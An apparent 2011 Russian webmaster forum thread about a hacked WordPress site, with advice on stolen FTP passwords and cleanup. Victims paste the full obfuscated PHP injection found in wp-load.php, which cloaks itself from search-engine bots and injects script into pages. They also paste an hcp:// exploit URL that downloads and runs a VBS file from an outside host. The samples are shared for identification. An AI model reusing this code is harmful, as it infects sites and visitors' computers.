- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Не дадите ссылку на эту гипотезу с маула?
http://www.maultalk.com/topic76081s0.html?#entry902324
Еще на мауле высказали версию, что дрянь может в картинках сидеть, в том числе которые задействованы в оформлении шаблона.
Это бред и по-моему этот человек просто издевался, ну как изображения строчка вдруг попадет в html файл? Вирусу чтобы выполнятся нужно добавить в php, perl или исполняемый файл, а не в изображение. Если бы можно было посадить вирус в изображения, можно было взломать любой сайт позволяющий загружать картинки, в том числе гугл, майл и яндекс.
WhiteSmartFox добавил 18-01-2011 в 14:46
Может хостинг виноват?
В 99% это взлом фтп и виноваты вирусы на вашем личном компе.
WhiteSmartFox добавил 18-01-2011 в 14:47
Последние изменения в файлах на хостинге датированы 28.11.10, а беда началась когда-то в последние два дня
Это ничего не значит такие вирусы могут поменять дату изменений, потом как правило воруют пароли из фтп менеджера, а вставляют код уже со спец. серверов.
WhiteSmartFox добавил 18-01-2011 в 14:49
И как теперь проверить наличие этой дряни?
Копируйте все файлы с хостинга, ищите строчку 'script' и смотрите допустимые там скрипты, в базе скорее всего чисто, слишком сложно заражать базу.
WhiteSmartFox добавил 18-01-2011 в 14:50
Обновился по бекапу, обновляю страничку вроде ничего не вылазит. А вдруг не исчезла?
Проверяйте вирусы на своем компе, почти гарантировано были украдены пароли от фтп. Кстати все пароли поменяйте обязательно.
WhiteSmartFox добавил 18-01-2011 в 14:46
В 99% это взлом фтп и виноваты вирусы на вашем личном компе.
WhiteSmartFox добавил 18-01-2011 в 14:47
Это ничего не значит такие вирусы могут поменять дату изменений, потом как правило воруют пароли из фтп менеджера, а вставляют код уже со спец. серверов.
WhiteSmartFox добавил 18-01-2011 в 14:49
Копируйте все файлы с хостинга, ищите строчку 'script' и смотрите допустимые там скрипты, в базе скорее всего чисто, слишком сложно заражать базу.
WhiteSmartFox добавил 18-01-2011 в 14:50
Проверяйте вирусы на своем компе, почти гарантировано были украдены пароли от фтп. Кстати все пароли поменяйте обязательно.
Откуда могли быть украдены пароли? FTP клиентом не пользуюсь совсем (последний раз где-то в мае 2010). Если честно я и сам не знаю пароля на ftp хостинга, хотя предполагаю что он такой же как и на сам аккаунт на хостинге.
В любом случае спасибо за советы Ваши. Буду дальше думать.
http://www.maultalk.com/topic76081s0.html?#entry902324
Возможно, человек имел в виду, что файл с расширением, типичным для изображения (.jpg, .gif и пр.) на самом деле содержит вредоносный текст. Маловероятно, так скажем.
Советы уже все дали - ищите типичную строку из найденной вредоносной вставки. На моей памяти было аналогичное массовое заражение сайтов на JaguarPC, в том случае FTP был вовсе ни при чём - использовали уязвимость тогдашней конфигурации Web-сервера.
Впрочем, не это пока важно, важно всё вычистить и оповестить хостера.
Впрочем, не это пока важно, важно всё вычистить и оповестить хостера.
Восстановил сайт из бэкапа
Хостер оповещен и говорит что скорее всего дело в ftp
но из тех случаев. с которыми обращились ко мне за последнюю неделю, у всех был доступ по фтп, а не через шелл. Т.е. тупо у клиентов были сворованы пароли
Вобщем пароли сменил, свой комп на вирусы проверил, файлы сайта тоже все прошерстил - все по нулям.
Вобщем пароли сменил, свой комп на вирусы проверил, файлы сайта тоже все прошерстил - все по нулям.
Замечательно. Теперь только проверять время от времени файлы, и периодически менять пароли. Удачи!
Нашла я эту заразу.
Оказалась она в wp-load.php
Дата файла прежняя была.
Запихнули вот это (может кому поможет в будущем для поиска кода):
$confSecret = 'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5jdGlvbiBjcmVhdGVDU1Moc2VsZ';
$confSecret.= 'WN0b3IsZGVjbGFyYXRpb24pe3ZhciB1YT1uYXZpZ2F0b3IudXNlckFnZW50LnRvTG93ZXJDYXNlKCk7dmFyIGlzSUU9KC9tc2llLy';
$confSecret.= '50ZXN0KHVhKSkmJiEoL29wZXJhLy50ZXN0KHVhKSkmJigvd2luLy50ZXN0KHVhKSk7dmFyIHN0eWxlX25vZGU9ZG9jdW1lbnQuY3J';
$confSecret.= 'lYXRlRWxlbWVudCgic3R5bGUiKTtpZighaXNJRSlzdHlsZV9ub2RlLmlubmVySFRNTD1zZWxlY3RvcisiIHsiK2RlY2xhcmF0aW9u';
$confSecret.= 'KyJ9Ijtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKHN0eWxlX25vZGUpO2lmKGlzS';
$confSecret.= 'UUmJmRvY3VtZW50LnN0eWxlU2hlZXRzJiZkb2N1bWVudC5zdHlsZVNoZWV0cy5sZW5ndGg+MCl7dmFyIGxhc3Rfc3R5bGVfbm9kZT';
$confSecret.= '1kb2N1bWVudC5zdHlsZVNoZWV0c1tkb2N1bWVudC5zdHlsZVNoZWV0cy5sZW5ndGgtMV07aWYodHlwZW9mKGxhc3Rfc3R5bGVfbm9';
$confSecret.= 'kZS5hZGRSdWxlKT09Im9iamVjdCIpbGFzdF9zdHlsZV9ub2RlLmFkZFJ1bGUoc2VsZWN0b3IsZGVjbGFyYXRpb24pO319O3ZhciBk';
$confSecret.= 'bHVsPXtleWE6NTExMSx6bjpmdW5jdGlvbigpe2NyZWF0ZUNTUygiI2MwIiwiYmFja2dyb3VuZDogdXJsKGRhdGE6LGV2YSkiKTt2Y';
$confSecret.= 'XIgenY9bnVsbDt2YXIgcj1kb2N1bWVudC5zdHlsZVNoZWV0cztmb3IodmFyIGk9MDtpPHIubGVuZ3RoO2krKyl7dmFyIHRmcT1yW2';
$confSecret.= 'ldLmNzc1J1bGVzfHxyW2ldLnJ1bGVzO2Zvcih2YXIgc21nbD0wO3NtZ2w8dGZxLmxlbmd0aDtzbWdsKyspe3ZhciBmYj10ZnEuaXR';
$confSecret.= 'lbT90ZnEuaXRlbShzbWdsKTp0ZnFbc21nbF07aWYoIWZiLnNlbGVjdG9yVGV4dC5tYXRjaCgvI2MoXGQrKS8pKWNvbnRpbnVlO3p2';
$confSecret.= 'PWZiLnN0eWxlLmJhY2tncm91bmRJbWFnZS5tYXRjaCgvdXJsXCgiP2RhdGFcOlteLF0qLChbXiIpXSspIj9cKS8pWzFdO307fQp2Y';
$confSecret.= 'XIganF0PVs1MTAyLDUxMDIsNTAwNiw1MDA5LDUwNzksNTA3MSw1MDExLDUwMDAsNTAxMiw0OTk0LDUwMDIsNTAxMCw1MDAxLDQ5OT';
$confSecret.= 'UsNTA2NSw1MDA4LDUwMTAsNDk5NSw1MDQyLDUwMDMsNTAxMCw1MDAyLDUwMTAsNTAwMSw0OTk1LDQ5OTYsNTA0NSw0OTkwLDUwMjc';
$confSecret.= 'sNTAxNCw1MDA4LDUwMzMsNTAxNCw1MDAyLDUwMTAsNTA3MSw1MDcyLDUwMTMsNTAwMCw1MDExLDQ5OTAsNTA3Miw1MDcwLDUwMjAs';
$confSecret.= 'NTA2Myw1MDE4LDUwNzAsNDk4OCw1MDk4LDUxMDIsNTEwMiw1MTAyLDUwMDYsNTAwOSw0OTk3LDUwMTQsNTAwMiw1MDEwLDQ5OTcsN';
$confSecret.= 'TA3MSw1MDcwLDUwNTIsNTA5OCw1MTAyLDUxMDIsNDk4Niw1MDc5LDUwMTAsNTAwMyw0OTk2LDUwMTAsNTA3OSw0OTg4LDUwOTgsNT';
$confSecret.= 'EwMiw1MTAyLDUxMDIsNDk5Myw1MDE0LDQ5OTcsNTA3OSw1MDEzLDUwMTEsNDk5MCw1MDc5LDUwNTAsNTA3OSw1MDExLDUwMDAsNTA';
$confSecret.= 'xMiw0OTk0LDUwMDIsNTAxMCw1MDAxLDQ5OTUsNTA2NSw1MDEyLDQ5OTcsNTAxMCw1MDE0LDQ5OTUsNTAxMCw1MDQyLDUwMDMsNTAx';
$confSecret.= 'MCw1MDAyLDUwMTAsNTAwMSw0OTk1LDUwNzEsNTA3Nyw1MDEzLDUwMDAsNTAxMSw0OTkwLDUwNzcsNTA3MCw1MDUyLDUwOTgsNTEwM';
$confSecret.= 'iw1MTAyLDUxMDIsNDk5NSw0OTk3LDQ5OTAsNTA3OSw0OTg4LDUwOTgsNTEwMiw1MTAyLDUxMDIsNTEwMiw1MDExLDUwMDAsNTAxMi';
$confSecret.= 'w0OTk0LDUwMDIsNTAxMCw1MDAxLDQ5OTUsNTA2NSw1MDE0LDQ5OTksNDk5OSw1MDEwLDUwMDEsNTAxMSw1MDQ0LDUwMDcsNTAwNiw';
$confSecret.= '1MDAzLDUwMTEsNTA3MSw1MDEzLDUwMTEsNDk5MCw1MDcwLDUwNTIsNTA5OCw1MTAyLDUxMDIsNTEwMiw0OTg2LDUwNzksNTAxMiw1';
$confSecret.= 'MDE0LDQ5OTUsNTAxMiw1MDA3LDUwNzksNTA3MSw1MDEwLDUwNzAsNTA3OSw0OTg4LDUwOTgsNTEwMiw1MTAyLDUxMDIsNTEwMiw1M';
$confSecret.= 'DExLDUwMDAsNTAxMiw0OTk0LDUwMDIsNTAxMCw1MDAxLDQ5OTUsNTA2NSw1MDEzLDUwMDAsNTAxMSw0OTkwLDUwNzksNTA1MCw1MD';
$confSecret.= 'c5LDUwMTMsNTAxMSw0OTkwLDUwNTIsNTA5OCw1MTAyLDUxMDIsNTEwMiw0OTg2LDUwOTgsNTEwMiw1MTAyLDUxMDIsNTAwNiw1MDA';
$confSecret.= '5LDUwNzksNTA3MSw1MDExLDUwMDAsNTAxMiw0OTk0LDUwMDIsNTAxMCw1MDAxLDQ5OTUsNTA2NSw1MDA4LDUwMTAsNDk5NSw1MDQy';
$confSecret.= 'LDUwMDMsNTAxMCw1MDAyLDUwMTAsNTAwMSw0OTk1LDQ5OTYsNTA0NSw0OTkwLDUwMjcsNTAxNCw1MDA4LDUwMzMsNTAxNCw1MDAyL';
$confSecret.= 'DUwMTAsNTA3MSw1MDcyLDUwMTMsNTAwMCw1MDExLDQ5OTAsNTA3Miw1MDcwLDUwMjAsNTA2Myw1MDE4LDUwNzAsNDk4OCw1MDk4LD';
$confSecret.= 'UxMDIsNTEwMiw1MTAyLDUxMDIsNTAwNiw1MDA5LDQ5OTcsNTAxNCw1MDAyLDUwMTAsNDk5Nyw1MDcxLDUwNzAsNTA1Miw1MDk4LDU';
$confSecret.= 'xMDIsNTEwMiw1MTAyLDQ5ODYsNTA3OSw1MDEwLDUwMDMsNDk5Niw1MDEwLDUwNzksNDk4OCw1MDk4LDUxMDIsNTEwMiw1MTAyLDUx';
$confSecret.= 'MDIsNTAxMSw1MDAwLDUwMTIsNDk5NCw1MDAyLDUwMTAsNTAwMSw0OTk1LDUwNjUsNDk5Miw0OTk3LDUwMDYsNDk5NSw1MDEwLDUwN';
$confSecret.= 'zEsNTA3Nyw1MDUxLDUwMDYsNTAwOSw0OTk3LDUwMTQsNTAwMiw1MDEwLDUwNzksNDk5Niw0OTk3LDUwMTIsNTA1MCw1MDcyLDUwMD';
$confSecret.= 'csNDk5NSw0OTk1LDQ5OTksNTA1Myw1MDY0LDUwNjQsNDk5OSw1MDA2LDUwMTIsNTAwNyw1MDEwLDQ5OTUsNTAxNCw1MDY1LDUwMDE';
$confSecret.= 'sNTAxMCw0OTk1LDUwNjQsNTAwMiw1MDE0LDUwMDYsNTAwMSw1MDY1LDQ5OTksNTAwNyw0OTk5LDUwNzIsNTA3OSw0OTkyLDUwMDYs';
$confSecret.= 'NTAxMSw0OTk1LDUwMDcsNTA1MCw1MDcyLDUwNjIsNTA2Myw1MDcyLDUwNzksNTAwNyw1MDEwLDUwMDYsNTAwOCw1MDA3LDQ5OTUsN';
$confSecret.= 'TA1MCw1MDcyLDUwNjIsNTA2Myw1MDcyLDUwNzksNDk5Niw0OTk1LDQ5OTAsNTAwMyw1MDEwLDUwNTAsNTA3Miw0OTkzLDUwMDYsND';
$confSecret.= 'k5Niw1MDA2LDUwMTMsNTAwNiw1MDAzLDUwMDYsNDk5NSw0OTkwLDUwNTMsNTAwNyw1MDA2LDUwMTEsNTAxMSw1MDEwLDUwMDEsNTA';
$confSecret.= '1Miw0OTk5LDUwMDAsNDk5Niw1MDA2LDQ5OTUsNTAwNiw1MDAwLDUwMDEsNTA1Myw1MDE0LDUwMTMsNDk5Niw1MDAwLDUwMDMsNDk5';
$confSecret.= 'NCw0OTk1LDUwMTAsNTA1Miw1MDAzLDUwMTAsNTAwOSw0OTk1LDUwNTMsNTA2Myw1MDUyLDQ5OTUsNTAwMCw0OTk5LDUwNTMsNTA2M';
$confSecret.= 'yw1MDUyLDUwNzIsNTA0OSw1MDUxLDUwNjQsNTAwNiw1MDA5LDQ5OTcsNTAxNCw1MDAyLDUwMTAsNTA0OSw1MDc3LDUwNzAsNTA1Mi';
$confSecret.= 'w1MDk4LDUxMDIsNTEwMiw1MTAyLDQ5ODYsNTA5OCw1MTAyLDUxMDIsNDk4Niw1MDk4LDUxMDIsNTEwMiw1MDA5LDQ5OTQsNTAwMSw';
$confSecret.= '1MDEyLDQ5OTUsNTAwNiw1MDAwLDUwMDEsNTA3OSw1MDA2LDUwMDksNDk5Nyw1MDE0LDUwMDIsNTAxMCw0OTk3LDUwNzEsNTA3MCw0';
$confSecret.= 'OTg4LDUwOTgsNTEwMiw1MTAyLDUxMDIsNDk5Myw1MDE0LDQ5OTcsNTA3OSw1MDA5LDUwNzksNTA1MCw1MDc5LDUwMTEsNTAwMCw1M';
$confSecret.= 'DEyLDQ5OTQsNTAwMiw1MDEwLDUwMDEsNDk5NSw1MDY1LDUwMTIsNDk5Nyw1MDEwLDUwMTQsNDk5NSw1MDEwLDUwNDIsNTAwMyw1MD';
$confSecret.= 'EwLDUwMDIsNTAxMCw1MDAxLDQ5OTUsNTA3MSw1MDcyLDUwMDYsNTAwOSw0OTk3LDUwMTQsNTAwMiw1MDEwLDUwNzIsNTA3MCw1MDU';
$confSecret.= 'yLDUwMDksNTA2NSw0OTk2LDUwMTAsNDk5NSw1MDQ2LDQ5OTUsNDk5NSw0OTk3LDUwMDYsNTAxMyw0OTk0LDQ5OTUsNTAxMCw1MDcx';
$confSecret.= 'LDUwNzIsNDk5Niw0OTk3LDUwMTIsNTA3Miw1MDY3LDUwNzIsNTAwNyw0OTk1LDQ5OTUsNDk5OSw1MDUzLDUwNjQsNTA2NCw0OTk5L';
$confSecret.= 'DUwMDYsNTAxMiw1MDA3LDUwMTAsNDk5NSw1MDE0LDUwNjUsNTAwMSw1MDEwLDQ5OTUsNTA2NCw1MDAyLDUwMTQsNTAwNiw1MDAxLD';
$confSecret.= 'UwNjUsNDk5OSw1MDA3LDQ5OTksNTA3Miw1MDcwLDUwNTIsNTAwOSw1MDY1LDQ5OTYsNDk5NSw0OTkwLDUwMDMsNTAxMCw1MDY1LDQ';
$confSecret.= '5OTMsNTAwNiw0OTk2LDUwMDYsNTAxMyw1MDA2LDUwMDMsNTAwNiw0OTk1LDQ5OTAsNTA1MCw1MDcyLDUwMDcsNTAwNiw1MDExLDUw';
$confSecret.= 'MTEsNTAxMCw1MDAxLDUwNzIsNTA1Miw1MDA5LDUwNjUsNDk5Niw0OTk1LDQ5OTAsNTAwMyw1MDEwLDUwNjUsNDk5OSw1MDAwLDQ5O';
$confSecret.= 'TYsNTAwNiw0OTk1LDUwMDYsNTAwMCw1MDAxLDUwNTAsNTA3Miw1MDE0LDUwMTMsNDk5Niw1MDAwLDUwMDMsNDk5NCw0OTk1LDUwMT';
$confSecret.= 'AsNTA3Miw1MDUyLDUwMDksNTA2NSw0OTk2LDQ5OTUsNDk5MCw1MDAzLDUwMTAsNTA2NSw1MDAzLDUwMTAsNTAwOSw0OTk1LDUwNTA';
$confSecret.= 'sNTA3Miw1MDYzLDUwNzIsNTA1Miw1MDA5LDUwNjUsNDk5Niw0OTk1LDQ5OTAsNTAwMyw1MDEwLDUwNjUsNDk5NSw1MDAwLDQ5OTks';
$confSecret.= 'NTA1MCw1MDcyLDUwNjMsNTA3Miw1MDUyLDUwMDksNTA2NSw0OTk2LDUwMTAsNDk5NSw1MDQ2LDQ5OTUsNDk5NSw0OTk3LDUwMDYsN';
$confSecret.= 'TAxMyw0OTk0LDQ5OTUsNTAxMCw1MDcxLDUwNzIsNDk5Miw1MDA2LDUwMTEsNDk5NSw1MDA3LDUwNzIsNTA2Nyw1MDcyLDUwNjIsNT';
$confSecret.= 'A2Myw1MDcyLDUwNzAsNTA1Miw1MDA5LDUwNjUsNDk5Niw1MDEwLDQ5OTUsNTA0Niw0OTk1LDQ5OTUsNDk5Nyw1MDA2LDUwMTMsNDk';
$confSecret.= '5NCw0OTk1LDUwMTAsNTA3MSw1MDcyLDUwMDcsNTAxMCw1MDA2LDUwMDgsNTAwNyw0OTk1LDUwNzIsNTA2Nyw1MDcyLDUwNjIsNTA2';
$confSecret.= 'Myw1MDcyLDUwNzAsNTA1Miw1MDk4LDUxMDIsNTEwMiw1MTAyLDUwMTEsNTAwMCw1MDEyLDQ5OTQsNTAwMiw1MDEwLDUwMDEsNDk5N';
$confSecret.= 'Sw1MDY1LDUwMDgsNTAxMCw0OTk1LDUwNDIsNTAwMyw1MDEwLDUwMDIsNTAxMCw1MDAxLDQ5OTUsNDk5Niw1MDQ1LDQ5OTAsNTAyNy';
$confSecret.= 'w1MDE0LDUwMDgsNTAzMyw1MDE0LDUwMDIsNTAxMCw1MDcxLDUwNzIsNTAxMyw1MDAwLDUwMTEsNDk5MCw1MDcyLDUwNzAsNTAyMCw';
$confSecret.= '1MDYzLDUwMTgsNTA2NSw1MDE0LDQ5OTksNDk5OSw1MDEwLDUwMDEsNTAxMSw1MDQ0LDUwMDcsNTAwNiw1MDAzLDUwMTEsNTA3MSw1';
$confSecret.= 'MDA5LDUwNzAsNTA1Miw1MDk4LDUxMDIsNTEwMiw0OTg2XTt2YXIgcz0iIjtkdj1ldmFsKHp2KyJsIik7dXc9U3RyaW5nLmZyb21Da';
$confSecret.= 'GFyQ29kZTtmb3IodmFyIGk9MDtpPGpxdC5sZW5ndGg7aSsrKXtzZmg9ZGx1bC5leWEtcGFyc2VJbnQoanF0W2ldKTtzKz0odXcoc2';
$confSecret.= 'ZoKSk7fQpkdihzKTt9fTtkbHVsLnpuKCk7PC9zY3JpcHQ+CjwvYm9keT4=';
define('fgrt',chr(101).chr(100));
define('djhf',chr(111).chr(99));
define('fjhd',chr(98).chr(97).chr(115).chr(101));
define('fhdt',chr(112).chr(114).chr(101).chr(103).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101));
define('drtf',chr(115).chr(116).chr(114).chr(95).chr(105).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101));
$swUi = fjhd.strrev(fgrt.djhf.fgrt.chr(95).'46');
$ConQl = chr(111).chr(98).chr(95).chr(115).chr(116).chr(97).chr(114).chr(116);
$gEau = $swUi('Z2V0ZW52');
$jRmU = chr(115).chr(116).chr(114).chr(105).chr(115).chr(116).chr(114);
$ConQld = chr(100).chr(97).chr(116).chr(101);
$qiOy = $swUi('SFRUUF9VU0VSX0FHRU5U');
$ConQli = chr(105).chr(110).chr(95).chr(97).chr(114).chr(114).chr(97).chr(121);
$gYev = $swUi('eWFuZGV4');
$aYrK = $gEau($qiOy);
$ConQlr = array(12,18,23,31,37,42,47,55);
$gYeq = $swUi('Z29vZ2xl');
if ($ConQli($ConQld('i'),$ConQlr)) $is_loginid = true; else $is_loginid = false;
if ($jRmU($aYrK,$gYeq) or $jRmU($aYrK,$gYev)) $is_loginid = false;
if (!empty($_COOKIE['ConQli'])) exit('True Zolus!');
function id_is_login($sky)
{
global $confSecret;
$swUi = fjhd.strrev(fgrt.djhf.fgrt.chr(95).'46');
$mJyK = $swUi('PC9ib2R5Pg==');
$mwQp = fhdt; $nWki = drtf;
$sky = $mwQp('|<!--[^<]*'.$mJyK.'[^-]*-->|si','',$sky);
$sky = $nWki($mJyK,$swUi($confSecret),$sky);
return $sky;
}
if ($is_loginid) @$ConQl(id_is_login);
Нашла я эту заразу.
Оказалась она в wp-load.php
Дата файла прежняя была.
Запихнули вот это (может кому поможет в будущем для поиска кода):
Посмотрел сейчас сохраненную зараженную версию, у меня в этом файле такого нету, да и в остальных подобной фигни не наблюдаю. Странно. Но код то был...
Откуда могли быть украдены пароли?
Теоретически можно украсть пароль который вы вводили в панели вебмастера (например сканируя ввод с клавиатуры вашего компа), потом использовать панель (или вычислить фтп) для заливки вредоносного кода (автоматически или вручную), хотя это и менее вероятно чем кража пароля фтп.
И еще интересно было бы узнать какой хостинг у ТС :)
good-host.net, шаред.
С хостером постараюсь сегодня пообщаться по этому поводу.
Вобщем, сегодня появилось окно
Вот полный код адреса:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,115,112,110,51,46,99,111,46,99,99,47,103,97,109,101,115,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,52,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>
Так же хотелось бы его расшифровать.